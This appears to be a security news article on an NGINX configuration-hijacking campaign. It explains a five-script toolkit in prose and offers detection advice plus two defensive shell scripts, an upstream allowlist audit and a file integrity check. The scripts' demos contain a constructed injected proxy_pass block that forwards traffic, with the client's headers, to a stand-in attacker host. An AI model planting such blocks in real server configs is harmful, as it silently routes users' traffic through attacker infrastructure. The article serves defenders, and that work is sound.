NGINX Hijacked: How Attackers Are Redirecting User Traffic Undetected

A new campaign targeting NGINX servers is quietly rerouting user traffic through attacker-controlled infrastructure without triggering alarms. Discovered by Datadog Security Labs, the operation abuses configuration files rather than software vulnerabilities, which is what makes it both stealthy and dangerous.

The threat actor isn’t breaking into NGINX—they’re rewriting its rules.

What’s Happening

NGINX is widely used for web serving, load balancing, and reverse proxying. In this campaign, attackers:

  • Inject malicious location blocks into existing NGINX config files.
  • Use the proxy_pass directive inside those blocks to forward requests to attacker-controlled domains.
  • Pass the original Host, User-Agent, and Referer headers through to the attacker's upstream, so the hijacked requests look like ordinary client traffic.

The 5-Stage Toolkit

The attack uses a scripted toolkit with five stages:

  1. zx.sh – Downloads and executes the remaining scripts, with a raw TCP connection as a fallback download method.
  2. bt.sh – Targets NGINX configs managed by the Baota (BT) panel; injects templates selected by server_name.
  3. 4zdh.sh – Scans common config paths; uses awk, csplit, and file hashing to split and rewrite config files without corrupting them.
  4. zdh.sh – Focuses on /etc/nginx/sites-enabled; targets .in and .id domains.
  5. ok.sh – Maps hijacked domains to their proxy targets and sends the results to the C2 server at 158.94.210[.]227.

Why It’s Hard to Detect

  • No exploit used: the attackers abuse legitimate config directives, so there is no vulnerability signature to match.
  • Traffic still reaches its destination: requests are proxied onward through the attacker's infrastructure, so users see no change.
  • Headers preserved: the proxied requests appear normal to the final site.
  • No service downtime: the injected config is valid, so NGINX reloads cleanly.

Unless defenders monitor config files or outbound proxy traffic, this attack flies under the radar.

What You Can Do

Detection Tips

  • Monitor for unexpected changes to NGINX config files in the paths the scripts scan, including /etc/nginx/sites-enabled.
  • Alert on proxy_pass directives whose upstream is an external host not on an allowlist of known backends.
  • Flag unusual outbound proxy traffic from servers hosting .edu, .gov, .in, .id, .pe, .bd, and .th domains, the TLDs this campaign targets.
  • Watch for scripted config reloads and forced restarts (for example, pkill nginx followed by a restart).
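The injected location block described under What's Happening, and the proxy_pass audit suggested in the detection tips above, as an added example that is not code from the report, from Datadog, or from the toolkit: a POSIX shell script that builds a constructed NGINX config tree (the attacker host proxy.attacker.example, the file layout and the allowlist contents are hypothetical), lists every proxy_pass upstream with its file and line, and reports the ones missing from an allowlist of known backends.

```shell
#!/bin/sh
# Added example, not code from the report or from the toolkit it describes.
# Assumes a POSIX shell with find, grep -H, sed -E and awk (GNU or BSD).
set -eu

# Build a constructed NGINX config tree in a temp dir: one legitimate backend
# plus one injected location block of the kind the campaign plants. The
# injected block uses proxy_pass to send requests to an attacker host and
# proxy_set_header to carry the client's Host, User-Agent and Referer along,
# so the hijacked requests look like ordinary traffic. The attacker host and
# the config are hypothetical. Prints the temp dir path.
make_sample_config() {
    dir=$(mktemp -d)
    mkdir -p "$dir/sites-enabled"
    cat > "$dir/sites-enabled/example.conf" <<'EOF'
server {
    listen 80;
    server_name www.example.in;

    # legitimate reverse proxy to a local application
    location /api/ {
        proxy_pass http://127.0.0.1:8080;
    }

    # injected block (constructed for this example)
    location / {
        proxy_pass http://proxy.attacker.example:8080;
        proxy_set_header Host $host;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
    }
}
EOF
    printf '%s\n' "$dir"
}

# Print "file:line host" for every proxy_pass directive in *.conf files under $1.
# "host" is the upstream name or hostname with scheme, port and path stripped;
# a variable such as $host is reported literally so it gets reviewed too.
list_proxy_targets() {
    find "$1" -type f -name '*.conf' \
        -exec grep -HnE '^[[:space:]]*proxy_pass[[:space:]]' {} + \
    | sed -E 's#^([^:]+:[0-9]+):[[:space:]]*proxy_pass[[:space:]]+([a-z]+://)?([^/:;[:space:]]+).*#\1 \3#'
}

# Print only the targets whose host is absent from the allowlist file $2
# (one host or upstream name per line). Empty output means nothing to review.
flag_unknown_targets() {
    list_proxy_targets "$1" | awk -v allow="$2" '
        BEGIN { while ((getline h < allow) > 0) ok[h] = 1 }
        !($2 in ok) { print }'
}

# Demo: run with --demo to see the single unexpected upstream get reported.
if [ "${1:-}" = "--demo" ]; then
    cfg=$(make_sample_config)
    printf '127.0.0.1\nlocalhost\nbackend\n' > "$cfg/allow.txt"
    flag_unknown_targets "$cfg/sites-enabled" "$cfg/allow.txt"
fi
```

On a real server, point list_proxy_targets at /etc/nginx and feed flag_unknown_targets the upstream names and hosts your deployment actually uses; anything it prints, including a variable such as $host as the target, is a rule someone should be able to explain. Run it from cron or after every config change and alert on non-empty output.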

Defense Recommendations

  • Implement file integrity monitoring on the NGINX config directories and alert on any change that is not part of a deployment.
  • Restrict write access to config files to the deployment process and enforce change control.
  • Baseline the upstreams each server legitimately proxies to, and use behavioral analytics to catch new or unexpected proxy targets.
  • Regularly audit proxy_pass rules and their backend targets.
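A minimal file integrity baseline and check for the NGINX config directories, covering the first recommendation above, as an added example that is not code from the report or from any FIM product. It assumes sha256sum (GNU coreutils; on macOS substitute shasum -a 256) and config paths without spaces; the demo tree, the injected block and the file name zz-injected.conf are constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the report. Assumes sha256sum (GNU coreutils;
# on macOS substitute "shasum -a 256") and paths without spaces.
set -eu

# Record a baseline of the config tree at $1: one "sha256  ./relative/path"
# line per regular file, sorted by path so baselines diff cleanly. Store the
# output somewhere the web server's user cannot write.
fim_baseline() {
    (cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k2)
}

# Compare the tree at $1 against the baseline file $2. Prints one line per
# difference (CHANGED, ADDED or REMOVED, then the path) and nothing when the
# tree matches, so the output can feed an alert directly.
fim_verify() {
    now=$(mktemp)
    fim_baseline "$1" > "$now"
    awk -v base="$2" '
        FILENAME == base { old[$2] = $1; next }
        {
            seen[$2] = 1
            if (!($2 in old))        print "ADDED " $2
            else if (old[$2] != $1)  print "CHANGED " $2
        }
        END { for (p in old) if (!(p in seen)) print "REMOVED " p }
    ' "$2" "$now" | LC_ALL=C sort
    rm -f "$now"
}

# Constructed demo tree: a clean site config. Prints the temp dir path.
make_demo_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/sites-enabled" "$dir/conf.d"
    printf 'server {\n    listen 80;\n    server_name www.example.id;\n}\n' \
        > "$dir/sites-enabled/example.conf"
    printf '%s\n' "$dir"
}

# Simulate the campaign's effect on the demo tree: rewrite the site config
# with an injected proxy_pass location (hypothetical attacker host) and drop
# an extra file into conf.d.
tamper_demo_tree() {
    cat > "$1/sites-enabled/example.conf" <<'EOF'
server {
    listen 80;
    server_name www.example.id;
    location / {
        proxy_pass http://proxy.attacker.example;
    }
}
EOF
    printf 'server_tokens off;\n' > "$1/conf.d/zz-injected.conf"
}

# Demo: run with --demo; the first check prints nothing, the second reports
# "ADDED ./conf.d/zz-injected.conf" and "CHANGED ./sites-enabled/example.conf".
if [ "${1:-}" = "--demo" ]; then
    tree=$(make_demo_tree)
    fim_baseline "$tree" > "$tree.baseline"
    fim_verify "$tree" "$tree.baseline"
    tamper_demo_tree "$tree"
    fim_verify "$tree" "$tree.baseline"
fi
```

In production, regenerate the baseline only as the last step of a legitimate deployment and keep it off the host or read-only for the nginx user, otherwise the same script that rewrites the config can rewrite the baseline. Any CHANGED or ADDED line is worth a look at the proxy_pass targets in that file before the next reload.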

Final Thoughts

This campaign shows how attackers are evolving—not by exploiting vulnerabilities, but by hijacking configurations. NGINX admins must treat config files as critical assets and monitor them like code.
